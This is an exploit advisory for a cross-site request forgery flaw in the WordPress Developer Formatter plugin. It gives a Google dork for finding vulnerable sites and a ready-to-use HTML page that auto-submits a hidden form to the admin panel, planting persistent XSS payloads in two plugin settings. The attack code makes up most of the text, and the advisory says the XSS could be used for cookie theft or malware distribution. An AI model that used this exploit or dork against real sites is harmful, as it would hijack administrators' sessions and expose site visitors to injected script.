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WordPress Developer Formatter CSRF Vulnerability

# Exploit Title: WordPress Developer Formatter CSRF Vulnerability
# Google Dork: inurl:devformatter/devformatter.php
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: | Website:
# Software Link:
# Vendor:
# Tested on: CentOS 5  
# Version: WordPress Version 3.5, Should work on all versions.

[#] Vulnerable Code
Page: devinterface.php - Line: 46  
 <form method="post" action="options-general.php?page=devformatter/devformatter.php">
[#] no nonce given - Read:
// CSRF Exploit:
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/> 
<input name="copyclipboartext" type="text" style="display:none;" value="&lt;/textarea&gt;<script>alert(/xss/)</script>"  />
<input name="showtools" style="display:none;" type="checkbox" checked/> 
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;"> 
	  body {
  background-image: url('javascript:alert("XSS");') !important;
[#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing,
    malware distribution or even a defacememnt.
[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, 
                The Author of this exploit takes no responsibility for the way
                you use this exploit, you are responsible for your own actions.	
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WordPress Developer Formatter CSRF Vulnerability
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